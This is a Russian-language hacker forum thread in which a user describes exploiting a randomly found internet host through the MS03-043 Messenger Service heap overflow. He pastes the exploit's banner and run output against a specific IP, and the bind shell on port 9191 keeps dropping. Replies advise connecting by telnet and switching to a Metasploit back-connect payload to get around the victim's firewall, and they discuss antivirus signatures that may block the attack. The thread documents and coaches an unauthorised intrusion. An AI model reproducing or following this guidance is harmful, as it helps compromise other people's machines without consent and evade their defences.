![]() |
Sos!
Привет всем онлайновским перцам! У меня небольшая проблемка, в которой я прошу помочь мне разобраться. Значит так! Нарыл я в инете одну дырявую тачку. Уязвимость Microsoft RPS (ms03-043).
на 135 порту. Залил сплойт. После этого мона было подконнектиться к порту 9191, но когда я начинал тельнетиться к этому порту, соединение сбрасывалось. Вот небольшой листинг, так сказать, моего сплойта, которого я запаивал при его запуске. C:\Windows\remote.exe -=[MS Messenger Service Heap Overflow Exploit (ms03-43) ver 0.7]=- by Adik <netmaniac [at] hotmail.kg> http://netninja.to.kg Target OS version: [0] Windows 2000 SP 3 <en> [1] Windows XP SP 1 <en> Usage: remote.exe [TargetIP] [ver: 0 :1] eg: msgr.exe 192.168.63.130 0 C:\Windows А вот этот после соотвествующих действий: C:\Windows\remote.exe -=[ MS Messenger Service Heap Overflow Ex by Adik <netmaniac [at] hotmail.KG > http://netninja.to.kg [*] Target: IP: 85.192.128.18 [*] UEF: 0x77ed73b4 [*] JMP: 0x7804bf52 [*] WSAStartup initialized... [*] Msg body size: 3600 [*] Socket initialized... [*] Injecting packet into a remote proces [*] Packet injected... [i] Try connecting to 85.192.128.18:9191 Помогите разобраться. :) |
TELNET 85.192.128.18:9191
или юзай putty |
Да в том то и дело! Когда начинаю тельнетиться, соединение сначала идет, а потом секунд ч-з 10 сбрасывается!
Telnet 85.192.128.18:9191 Connecting 85.192.128.18. . . Не удается установить соединение с 85.192.128.18 на порт 9191. Сбой подключения. HELP! ------------------------------------------------------------------- Говори кратко, проси мало, уходи быстро и больше не вспоминай о чем попросил... |
Ну вроде всё правильно, если эксплоит рабочий.
Можно попробовать заюзать аналогичный сплоит в метасплоите. Там точно был под виндовый месенджер. И в качестве шелкода использовать не бинд порта, а бэкконнект. Тогда поганый виндовый фаервол не будет помехой(хотя я уже не помню, был ли в 1 СП фаер. вроде был). Он скорее всего и мешает. Но тут ещё вот в чём фича. Если у жертвы стоит Аутпост, или Касперский 5 и выше, то там есть в базах сигнатура этого сплоита. И уязвимость может существовать, но заюзать её могут помешать. Так что, думаю не судьба. такое бывает. |
Elekt
Пасиб конечно за развернутый ответ. Сплойт рабочий, по крайней мере сливал с разный паг два раза. Сплойт должен быть рабочий! Но я попробую ч-з бэконнект, посмотрю, что из этого выйдет. Пробовал другие сплойты связанные с уязвимостью RPC на 135 порту, тоже такая же батва. Уже голову сломал. Может еще что-нить подскажет? |
Темку можно крыть. Все вопросы решены.
|
| Время: 15:13 |